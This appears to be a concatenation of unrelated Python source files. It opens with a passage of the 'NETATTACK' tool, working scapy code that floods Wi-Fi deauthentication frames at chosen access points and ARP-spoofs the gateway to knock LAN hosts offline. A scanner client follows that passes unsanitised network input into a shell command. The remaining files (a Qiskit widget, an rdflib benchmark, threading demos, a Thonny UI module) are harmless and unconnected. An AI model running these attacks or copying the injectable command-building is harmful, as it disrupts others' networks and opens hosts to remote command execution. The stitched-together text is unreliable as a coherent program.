iface = get_iface()
conf.iface = iface
thread_scan = Thread(target=wifi_scan, args=[False, False, True, iface])
thread_scan.daemon = True
thread_scan.start()
os.system('clear')
print('\n{0}Scanning for Access-Points. Press {1}Ctrl+C {0}to continue choosing a target.{2}'.format(G, R, N))
print('\n{0}{4}BSSID{1}CH{2}ENC{3}ESSID'.format(N, ' '*17, ' '*5, ' '*6, ' '*6))
printed_APs = []
try:
while True:
for bssid in APs.keys():
if bssid not in printed_APs:
channel = APs[bssid]['channel']
essid = APs[bssid]['essid']
enc = APs[bssid]['enc']
ID = APs[bssid]['id']
channel_space = 2
if len(str(channel)) == 1:
channel_space = 3
print(' {2}[{7}{9}{2}] {0}{1} {2}| {3}{4}| {5}{6} {2}| {7}{8}{2}'.format(R, bssid.upper(), N, str(channel), ' '*channel_space, B, enc, Y, essid, ID))
printed_APs.append(bssid)
except(KeyboardInterrupt):
do_channelhop = False
pass
print('\n{0}Choose {1}ONE {0}of the targets listed above.{2}\n'.format(G, R, N))
chosen_ID = choice_input()
BSSID, CHANNEL = None, None
for bssid in APs:
if APs[bssid]['id'] == chosen_ID:
BSSID = bssid
CHANNEL = APs[bssid]['channel']
deauth()
def deauth_multiple():
global do_channelhop
def choice_input():
while True:
try:
user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
user_input = user_input.replace(' ', '')
target_list_str = user_input.split(',')
target_list = []
try:
for num in target_list_str:
_ = int(num)
except:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
for x in target_list_str:
target_list.append(int(x))
for num in target_list:
if num < 1 or num > len(APs):
target_list.remove(num)
if len(target_list) <= 1:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
return target_list
def deauth():
print('\nDeauth-List:')
for ID in target_list:
for bssid in APs:
if APs[bssid]['id'] == ID:
print('{0}{1} {4}| {2}{3}{4}'.format(R, bssid.upper(), Y, APs[bssid]['essid'], N))
print('\n{0}Deauthing ...\n{1}'.format(G, N))
while True:
for ID in target_list:
for bssid in APs:
if APs[bssid]['id'] == ID:
os.system('iwconfig {0} channel {1}'.format(iface, APs[bssid]['channel']))
for x in range(64):
try:
send(Dot11(addr1='FF:FF:FF:FF:FF:FF', addr2=bssid, addr3=bssid) / Dot11Deauth())
except(KeyboardInterrupt):
print('{0}Deauthing cancelled.{1}'.format(R, N))
sys.exit(1)
iface = get_iface()
conf.iface = iface
thread_scan = Thread(target=wifi_scan, args=[False, False, True, iface])
thread_scan.daemon = True
thread_scan.start()
os.system('clear')
print('\n{0}Scanning for Access-Points. Press {1}Ctrl+C {0}to continue choosing a target.{2}'.format(G, R, N))
print('\n{0}{4}BSSID{1}CH{2}ENC{3}ESSID'.format(N, ' '*17, ' '*5, ' '*6, ' '*6))
printed_APs = []
try:
while True:
for bssid in APs.keys():
if bssid not in printed_APs:
channel = APs[bssid]['channel']
essid = APs[bssid]['essid']
enc = APs[bssid]['enc']
ID = APs[bssid]['id']
channel_space = 2
if len(str(channel)) == 1:
channel_space = 3
print(' {2}[{7}{9}{2}] {0}{1} {2}| {3}{4}| {5}{6} {2}| {7}{8}{2}'.format(R, bssid.upper(), N, str(channel), ' '*channel_space, B, enc, Y, essid, ID))
printed_APs.append(bssid)
except(KeyboardInterrupt):
do_channelhop = False
pass
print('\n\n{0}Choose {1}MULTIPLE {0}targets listed above.\nSeperate each target by tiping \'{1},{0}\'\n{2}'.format(G, R, N))
target_list = choice_input()
deauth()
def deauth_all():
global do_deauth, do_channelhop, do_print_ap
def pause():
global do_deauth, do_channelhop, do_print_ap, APs
while True:
sleep(120)
print('\n{0}Scanning ...{1}\n'.format(G, N))
APs = {}
do_print_ap = True
do_channelhop = True
do_deauth = False
sleep(10)
print('\n{0}Deauthing ...{1}\n'.format(G, N))
do_channelhop = False
do_deauth = True
do_print_ap = False
iface = get_iface()
conf.iface = iface
scan_thread = Thread(target=wifi_scan, args=[True, True, False, iface])
scan_thread.daemon = True
pause_thread = Thread(target=pause, args=[])
pause_thread.daemon = True
os.system('clear')
print('{0}Scanning for networks each 120s (duration: 10s){1}\n'.format(G, N))
scan_thread.start()
pause_thread.start()
sleep(10)
do_channelhop = False
do_print_ap = False
print('\n{0}Deauthing ...{1}\n'.format(G, N))
while True:
if do_deauth:
for bssid in APs.keys():
os.system('iwconfig {0} channel {1}'.format(iface, APs[bssid]['channel']))
for x in range(2):
try:
send(Dot11(addr1='FF:FF:FF:FF:FF:FF', addr2=bssid, addr3=bssid) / Dot11Deauth())
except(KeyboardInterrupt):
print('{0}Deauthing cancelled.{1}'.format(R, N))
sys.exit(1)
except:
continue
def restore_kick(targets, gatewayIP, gatewayMAC):
print('\n\n{0}RESTORING TARGET(S): {1}Don\'t interrupt!{2}'.format(G, R, N))
for ip in targets:
IP = ip
MAC = targets[ip]['mac']
success = True
for x in range(10):
try:
send(ARP(op=2, pdst=IP, psrc=gatewayIP, hwdst='FF:FF:FF:FF:FF:FF', hwsrc=gatewayMAC))
send(ARP(op=2, pdst=gatewayIP, psrc=IP, hwdst='FF:FF:FF:FF:FF:FF', hwsrc=MAC))
except:
print('{0}ERROR: Can\'t restore {1}{2} {3}({4}{5}{3}). {0}Skipping.'.format(R, Y, MAC, N, B, IP))
success = False
pass
sleep(0.3)
if success:
print('{0}{1}Successfully restored: {2}{3} {4}({5}{6}{4})'.format(' ' * 4, G, R, MAC, N, Y, IP))
print('\n')
sys.exit(0)
def kick_one():
global kick_hosts
def choice_input():
global kick_hosts
while True:
try:
user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
if user_input.upper() != 'R':
try:
ID = int(user_input)
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
except:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
if ID not in range(len(kick_hosts)+1):
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
return ID
else:
kick_hosts = {}
kick_hosts = host_scan(True, True, True, True)
print('\n{0}{1}Choose {2}ONE {1}of the hosts listed above or press {2}R {1}for rescan:{3}'.format(' ' * 4, G, R, N))
def kick():
while True:
try:
send(ARP(op=2, psrc=gatewayIP, pdst=IP, hwdst=gatewayMAC))
sleep(4)
except(KeyboardInterrupt):
targets = {}
targets[IP] = {'mac': MAC}
restore_kick(targets, gatewayIP, gatewayMAC)
gatewayIP = get_gateway()
gatewayMAC = get_gateway_mac(gatewayIP)
kick_hosts = host_scan(True, True, True, True)
print('\n{0}{1}Choose {2}ONE {1}of the hosts listed above or press {2}R {1}for rescan:{3}\n'.format(' ' * 4, G, R, N))
chosen_ID = choice_input()
MAC, IP, NAME = None, None, None
for ip in kick_hosts:
if kick_hosts[ip]['id'] == chosen_ID:
MAC = kick_hosts[ip]['mac']
IP = ip
NAME = kick_hosts[ip]['name']
os.system('clear')
print('{0}Currently kicking: {1}{2} {3}| {4}{5} {3}| {6}{7}{3}'.format(G, R, MAC, N, Y, IP, B, NAME))
kick()
def kick_multiple():
global kick_hosts
def choice_input():
global kick_hosts
while True:
try:
user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
except(KeyboardInterrupt):
print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
sys.exit(1)
if user_input.upper() != 'R':
user_input = user_input.replace(' ', '')
target_list_str = user_input.split(',')
target_list = []
try:
for num in target_list_str:
_ = int(num)
except:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
for x in target_list_str:
target_list.append(int(x))
for num in target_list:
if num < 1 or num > len(kick_hosts):
target_list.remove(num)
if len(target_list) <= 1:
print('{0}ERROR: Your input was incorrect.'.format(R))
continue
return target_list
else:
kick_hosts = {}
kick_hosts = host_scan(True, True, True, True)
print('\n{0}{1}Choose {2}MULTIPLE {1}hosts listed above or press {2}R {1}for rescan:\n{0}Seperate the targets with \'{2},{1}\'\n'.format(' ' * 4, G, R, N))
def kick():
targets = {}
while True:
for target in target_list:
for host in kick_hosts:
if target == kick_hosts[host]['id']:
MAC = kick_hosts[host]['mac']
IP = host
NAME = kick_hosts[host]['name']
targets[IP] = {'mac': MAC}
try:
send(ARP(op=2, psrc=gatewayIP, pdst=IP, hwdst=gatewayMAC))
except(KeyboardInterrupt):
restore_kick(targets, gatewayIP, gatewayMAC)
try:
sleep(3.5)
except:
restore_kick(targets, gatewayIP, gatewayMAC)
gatewayIP = get_gateway()
gatewayMAC = get_gateway_mac(gatewayIP)
kick_hosts = host_scan(True, True, True, True)
print('\n{0}{1}Choose {2}MULTIPLE {1}hosts listed above or press {2}R {1}for rescan:\n{0}Seperate the targets with \'{2},{1}\'\n'.format(' ' * 4, G, R, N))
target_list = choice_input()
os.system('clear')
kick_msg = False
for target in target_list:
for host in kick_hosts:
if target == kick_hosts[host]['id']:
MAC = kick_hosts[host]['mac']
IP = host
NAME = kick_hosts[host]['name']
if kick_msg:
print('{8}{1}{2} {3}| {4}{5} {3}| {6}{7}{3}'.format(G, R, MAC, N, Y, IP, B, NAME, ' '*19))
if not kick_msg:
print('{0}Currently kicking{3}: {1}{2} {3}| {4}{5} {3}| {6}{7}{3}'.format(G, R, MAC, N, Y, IP, B, NAME))
kick_msg = True
kick()
def kick_all():
def kick():
for host in kick_hosts.keys():
if host == gatewayIP:
print('{0} -> not kicking: {1}{2}{0} ({4}gateway{0}){3}'.format(G, Y, gatewayIP, N, R))
del kick_hosts[host]
while True:
for host in kick_hosts:
try:
send(ARP(op=2, psrc=gatewayIP, pdst=host, hwdst=gatewayMAC))
except(KeyboardInterrupt):
restore_kick(kick_hosts, gatewayIP, gatewayMAC)
try:
sleep(2)
except(KeyboardInterrupt):
restore_kick(kick_hosts, gatewayIP, gatewayMAC)
gatewayIP = get_gateway()
gatewayMAC = get_gateway_mac(gatewayIP)
kick_hosts = host_scan(True, True, False, True)
sleep(0.2)
print('\n{0}KICKING STARTED ...{1}'.format(G, N))
kick()
#> MAIN
do_channelhop = True
do_deauth = True
do_print_ap = True
APs = {}
if __name__ == '__main__':
print_banner()
choice = get_choice()
handle_choice()
|
client.py | from data import functions
import socket
import threading
import sys
import json
from subprocess import Popen, PIPE
from time import sleep
def parsecommand(json_command):
command = "java -jar -Dfile.encoding=UTF-8 data/qubo.jar -nooutput"
if json_command["range"] is not None:
charther = ["-", ".", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0"]
goodrange = True
for char in json_command["range"]:
if charther.count(char) == 0:
goodrange = False
break
if goodrange:
command += " --iprange " + json_command["range"]
if json_command["portrange"] is not None:
charther = ["-", ",", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0"]
goodrange = True
for char in json_command["portrange"]:
if charther.count(char) == 0:
goodrange = False
break
if goodrange:
command += " --portrange " + json_command["portrange"]
if json_command["threads"] is not None:
if json_command["threads"] > 0:
command += " --threads " + str(json_command["threads"])
if json_command["timeout"] is not None:
if json_command["timeout"] > 0:
command += " --timeout " + str(json_command["timeout"])
if json_command["pingcount"] is not None:
if 0 < json_command["pingcount"] < 20:
command += " --pingcount " + str(json_command["pingcount"])
if json_command["fulloutput"]:
command += " -fulloutput "
if json_command["filtermotd"] is not None:
if 1 < json_command["filtermotd"].len() < 100:
command += " --filtermotd " + json_command["filtermotd"]
if json_command["noping"]:
command += " -noping "
if json_command["minonline"] is not None:
if json_command["minonline"] > 1:
command += " --minonline " + str(json_command["minonline"])
if json_command["filterversion"] is not None:
if 1 < json_command["filterversion"].len() < 100:
command += " --filterversion " + json_command["filterversion"]
return command, json_command["range"]
return None
def receive_mex(client_socket):
try:
arr = b''
while len(arr) < 1:
arr += client_socket.recv(1024)
return arr.decode("utf-8")
except:
return 0
class scan:
def __init__(self, sock):
self.command = []
self.scan_range = []
self.target = []
self.stdout = []
self.send_thread = []
self.sock = sock
self.connected = True
self.scan_counter = 0
self.scan_to_do = 0
self.scan_thread = threading.Thread(target=self.start_scan, daemon=True)
self.scan_thread.start()
def add_scan(self, command, target, scan_range):
if self.scan_counter < self.scan_to_do:
print(scan_range, language["client"]["scan_queue"])
self.command.append(command)
self.target.append(target)
self.scan_range.append(scan_range)
self.scan_to_do += 1
def start_scan(self):
while True:
if self.scan_counter < self.scan_to_do:
process = Popen(self.command[self.scan_counter], shell=True, stdout=PIPE, stderr=PIPE)
print(self.scan_range[self.scan_counter], language["client"]["scan_started"])
process.wait()
self.stdout.append(process.communicate()[0])
print(self.scan_range[self.scan_counter], language["client"]["scan_finished"])
self.send_thread.append(threading.Thread(target=self.send_results, daemon=True))
self.send_thread[self.scan_counter].start()
self.scan_counter += 1
def send_results(self):
counter = self.scan_counter
while True:
if self.connected:
self.sock.send(self.stdout[counter])
break
sleep(5)
def new_socket(self, sock):
self.sock = sock
self.connected = True
def set_status(self, status):
self.connected = status
def connection(port):
alert_connection = False
while True:
print(language["client"]["waiting_connection"])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('0.0.0.0', port))
sock.listen(5)
client_socket, address = sock.accept()
connected = True
if alert_connection:
scanner.new_socket(client_socket)
alert_connection = False
else:
scanner = scan(client_socket)
print(language["client"]["connection_established"], address)
while connected:
received_mex = receive_mex(client_socket)
if received_mex == 0:
connected = False
scanner.set_status(connected)
alert_connection = True
print(language["client"]["connection_lost"], address)
else:
json_command = json.loads(received_mex)
command, scan_range = parsecommand(json_command)
if command is not None:
scanner.add_scan(command, address, scan_range)
else:
client_socket.send(bytes("None", "utf-8"))
def main():
global settings
global language
settings = functions.get_settings()
language = functions.get_lang(settings)
functions.clear()
print(language["client"]["first_setup"])
port = input(language["choice"])
if port == "":
port = 4100
elif not 1025 <= int(port) <= 65535:
print(language["client"]["error_port_range"])
else:
port = int(port)
connection_thread = threading.Thread(target=connection, args=[port], daemon=True)
connection_thread.start()
while True:
x = input(language["client"]["stop_connection_question"])
if x.lower() == "stop":
sys.exit()
|
graph_digest_benchmark.py | #!/usr/bin/env python
'''
This benchmark will produce graph digests for all of the
downloadable ontologies available in Bioportal.
'''
from rdflib import *
from rdflib.compare import to_isomorphic
import sys, csv
from urllib import *
from io import StringIO
from collections import defaultdict
from urllib2 import urlopen
from multiprocessing import *
from Queue import Empty
bioportal_query = '''
PREFIX metadata: <http://data.bioontology.org/metadata/>
select distinct ?ontology ?title ?download where {
?ontology a metadata:Ontology;
metadata:omvname ?title;
metadata:links ?links.
?links metadata:Ontology ?download.
filter(regex(?download, "/download"))
}
'''
stat_cols = [
'id',
'ontology',
'download_url',
'tree_depth',
'color_count',
'individuations',
'prunings',
'initial_color_count',
'adjacent_nodes',
'initial_coloring_runtime',
'triple_count',
'graph_digest',
'to_hash_runtime',
'canonicalize_triples_runtime',
'error',
]
def files_benchmark(ontologies, output_file, threads):
w = open(output_file, 'w')
writer = csv.DictWriter(w, stat_cols)
writer.writeheader()
tasks = Queue()
finished_tasks = Queue()
dl_lock = Semaphore(4)
task_count = len(ontologies)
def worker(q, finished_tasks, dl_lock):
try:
while True:
stats = q.get()
og = Graph()
try:
og.load(stats['download_url'])
print stats['ontology'], stats['id']
ig = to_isomorphic(og)
graph_digest = ig.graph_digest(stats)
finished_tasks.put(stats)
except Exception as e:
print 'ERROR', stats['id'], e
stats['error'] = str(e)
finished_tasks.put(stats)
except Empty:
pass
for i in range(int(threads)):
print "Starting worker", i
t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
t.daemon = True
t.start()
for download in ontologies:
stats = defaultdict(str)
stats.update({
"id": download.split("/")[-1].split(".")[0],
"ontology": download.split("/")[-1].split(".")[0],
"download_url": download
})
tasks.put(stats)
tasks.close()
written_tasks = 0
while written_tasks < task_count:
stats = finished_tasks.get()
# print "Writing", stats['ontology']
writer.writerow(stats)
w.flush()
written_tasks += 1
def bioportal_benchmark(apikey, output_file, threads):
metadata = Namespace("http://data.bioontology.org/metadata/")
url = 'http://data.bioontology.org/ontologies?apikey=%s' % apikey
ontology_graph = Graph()
print url
ontology_list_json = urlopen(url).read()
ontology_graph.parse(StringIO(unicode(ontology_list_json)), format="json-ld")
ontologies = ontology_graph.query(bioportal_query)
w = open(output_file, 'w')
writer = csv.DictWriter(w, stat_cols)
writer.writeheader()
tasks = Queue()
finished_tasks = Queue()
dl_lock = Semaphore(4)
task_count = len(ontologies)
def worker(q, finished_tasks, dl_lock):
try:
while True:
stats = q.get()
og = Graph()
try:
try:
dl_lock.acquire()
og.load(stats['download_url'] + "?apikey=%s" % apikey)
finally:
dl_lock.release()
print stats['ontology'], stats['id']
ig = to_isomorphic(og)
graph_digest = ig.graph_digest(stats)
finished_tasks.put(stats)
except Exception as e:
print 'ERROR', stats['id'], e
stats['error'] = str(e)
finished_tasks.put(stats)
except Empty:
pass
for i in range(int(threads)):
print "Starting worker", i
t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
t.daemon = True
t.start()
for ontology, title, download in ontologies:
stats = defaultdict(str)
stats.update({
"id": ontology,
"ontology": title,
"download_url": download
})
tasks.put(stats)
tasks.close()
written_tasks = 0
while written_tasks < task_count:
stats = finished_tasks.get()
# print "Writing", stats['ontology']
writer.writerow(stats)
w.flush()
written_tasks += 1
if __name__ == '__main__':
if len(sys.argv) > 4:
files_benchmark(sys.argv[1:-2], sys.argv[-2], sys.argv[-1])
else:
bioportal_benchmark(sys.argv[1], sys.argv[2], sys.argv[3])
|
backend_info.py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=protected-access
"""Interactive backend widget."""
import threading
from typing import Union
import ipyvuetify as vue
from IPython.display import display # pylint: disable=import-error
from qiskit.test.mock import FakeBackendV2 as FakeBackend
from qiskit_ibm_provider.ibm_backend import IBMBackend
from .config_widget import config_tab
from .gates_widget import gates_tab
from .jobs_widget import jobs_tab
from .qubits_widget import qubits_tab
from .live_data_widget import LiveDataVisualization
from ..visualization.interactive import iplot_error_map
from ..utils.hgp import to_instance_format
def _async_job_loader(
tab: vue.TabItem, backend: Union[IBMBackend, FakeBackend]
) -> None:
"""Asynchronous job loader.
Args:
tab: Tab item.
backend: Backend to use.
"""
tab.children = [jobs_tab(backend)]
def backend_widget(backend: Union[IBMBackend, FakeBackend]) -> None:
"""Display backend information as a widget.
Args:
backend: Display information about this backend.
"""
vue.theme.dark = False
if isinstance(backend, FakeBackend):
cred = backend._credentials
instance = to_instance_format(cred.hub, cred.group, cred.project)
else:
instance = backend._api_client._params.instance
last_tab = vue.TabItem(children=[])
livedata = LiveDataVisualization()
card = vue.Card(
height=600,
outlined=True,
children=[
vue.Toolbar(
flat=True,
color="#002d9c",
children=[
vue.ToolbarTitle(
children=["{} @ ({})".format(backend.name(), instance)],
style_="color:white",
)
],
),
vue.Tabs(
vertical=True,
children=[
vue.Tab(children=["Configuration"]),
vue.Tab(children=["Qubits"]),
vue.Tab(children=["Non-local Gates"]),
vue.Tab(children=["Error map"]),
vue.Tab(children=["Live Data"]),
vue.Tab(children=["Job Summary"]),
vue.TabItem(children=[config_tab(backend)]),
vue.TabItem(children=[qubits_tab(backend)]),
vue.TabItem(children=[gates_tab(backend)]),
vue.TabItem(
children=[
iplot_error_map(
backend, figsize=(None, None), as_widget=True
)
]
),
vue.TabItem(
children=[
iplot_error_map(
backend, figsize=(None, None), as_widget=True
)
]
),
vue.TabItem(
children=[
livedata.create_visualization(
backend, figsize=(11, 9), show_title=False
)
]
),
last_tab,
],
),
],
)
# Load job data async for a bit better performance
thread = threading.Thread(target=_async_job_loader, args=(last_tab, backend))
thread.start()
display(card)
|
gil.py | import time
import threading
def profile(func):
def wrapper(*args, **kw):
import time
start = time.time()
func(*args, *kw)
end = time.time()
print('Cost:{}'.format(end-start))
return
return wrapper
def fib(n):
if n <= 2:
return n
return fib(n-1)+fib(n-2)
@profile
def nothread():
fib(36)
fib(36)
return
@profile
def withthread():
threads = []
for i in range(2):
t = threading.Thread(target=fib, args=(36,))
t.start()
threads.append(t)
for t in threads:
t.join()
nothread()
withthread()
|
__init__.py | # Threaded function snippet
import threading
from functools import wraps
def threaded(fn):
"""To use as decorator to make a function call threaded.
Needs import
from threading import Thread"""
@wraps(fn) # Not sure if this is necessary.....
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
|
multicast_test.py | import threading
import time
import typing as ty
from collections import defaultdict
from xoto3.utils.multicast import LazyMulticast
def test_lazy_multicast():
class Recvr(ty.NamedTuple):
nums: ty.List[int]
CONSUMER_COUNT = 10
NUM_NUMS = 30
sem = threading.Semaphore(0)
def start_numbers_stream(num_nums: int, recv):
def stream_numbers():
for i in range(CONSUMER_COUNT):
sem.acquire()
# wait for 10 consumers to start
for i in range(num_nums):
recv(i)
t = threading.Thread(target=stream_numbers, daemon=True)
t.start()
return t.join
mc = LazyMulticast(start_numbers_stream) # type: ignore
consumer_results = defaultdict(list)
def consume_numbers():
sem.release()
thread_id = threading.get_ident()
with mc(NUM_NUMS) as nums_stream:
for i, num in enumerate(nums_stream):
consumer_results[thread_id].append(num)
if i == NUM_NUMS - 1:
break
for i in range(CONSUMER_COUNT):
threading.Thread(target=consume_numbers, daemon=True).start()
time.sleep(1)
assert len(consumer_results) == CONSUMER_COUNT
for results in consumer_results.values():
assert list(range(NUM_NUMS)) == results
|
ui_utils.py | # -*- coding: utf-8 -*-
import collections
import logging
import os
import platform
import re
import signal
import subprocess
import sys
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from _tkinter import TclError
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.languages import get_button_padding, tr
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.tktextext import TweakableText
PARENS_REGEX = re.compile(r"[\(\)\{\}\[\]]")
class CommonDialog(tk.Toplevel):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self.bind("<FocusIn>", self._unlock_on_focus_in, True)
def _unlock_on_focus_in(self, event):
if not self.winfo_ismapped():
focussed_widget = self.focus_get()
self.deiconify()
if focussed_widget:
focussed_widget.focus_set()
def get_padding(self):
return ems_to_pixels(2)
class CommonDialogEx(CommonDialog):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
# Need to fill the dialog with a frame to gain theme support
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.bind("<Escape>", self.on_close, True)
self.protocol("WM_DELETE_WINDOW", self.on_close)
def on_close(self, event=None):
self.destroy()
class QueryDialog(CommonDialogEx):
def __init__(
self,
master,
title: str,
prompt: str,
initial_value: str = "",
options: List[str] = [],
entry_width: Optional[int] = None,
):
super().__init__(master)
self.var = tk.StringVar(value=initial_value)
self.result = None
margin = self.get_padding()
spacing = margin // 2
self.title(title)
self.prompt_label = ttk.Label(self.main_frame, text=prompt)
self.prompt_label.grid(row=1, column=1, columnspan=2, padx=margin, pady=(margin, spacing))
if options:
self.entry_widget = ttk.Combobox(
self.main_frame, textvariable=self.var, values=options, height=15, width=entry_width
)
else:
self.entry_widget = ttk.Entry(self.main_frame, textvariable=self.var, width=entry_width)
self.entry_widget.bind("<Return>", self.on_ok, True)
self.entry_widget.bind("<KP_Enter>", self.on_ok, True)
self.entry_widget.grid(
row=3, column=1, columnspan=2, sticky="we", padx=margin, pady=(0, margin)
)
self.ok_button = ttk.Button(
self.main_frame, text=tr("OK"), command=self.on_ok, default="active"
)
self.ok_button.grid(row=5, column=1, padx=(margin, spacing), pady=(0, margin), sticky="e")
self.cancel_button = ttk.Button(self.main_frame, text=tr("Cancel"), command=self.on_cancel)
self.cancel_button.grid(row=5, column=2, padx=(0, margin), pady=(0, margin), sticky="e")
self.main_frame.columnconfigure(1, weight=1)
self.entry_widget.focus_set()
def on_ok(self, event=None):
self.result = self.var.get()
self.destroy()
def on_cancel(self, event=None):
self.result = None
self.destroy()
def get_result(self) -> Optional[str]:
return self.result
def ask_string(
title: str,
prompt: str,
initial_value: str = "",
options: List[str] = [],
entry_width: Optional[int] = None,
master=None,
):
dlg = QueryDialog(
master, title, prompt, initial_value=initial_value, options=options, entry_width=entry_width
)
show_dialog(dlg, master)
return dlg.get_result()
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
("active", lookup_style_option("Menubar", "activebackground", "LightYellow")),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
Enables inserting panes according to their position_key-s.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
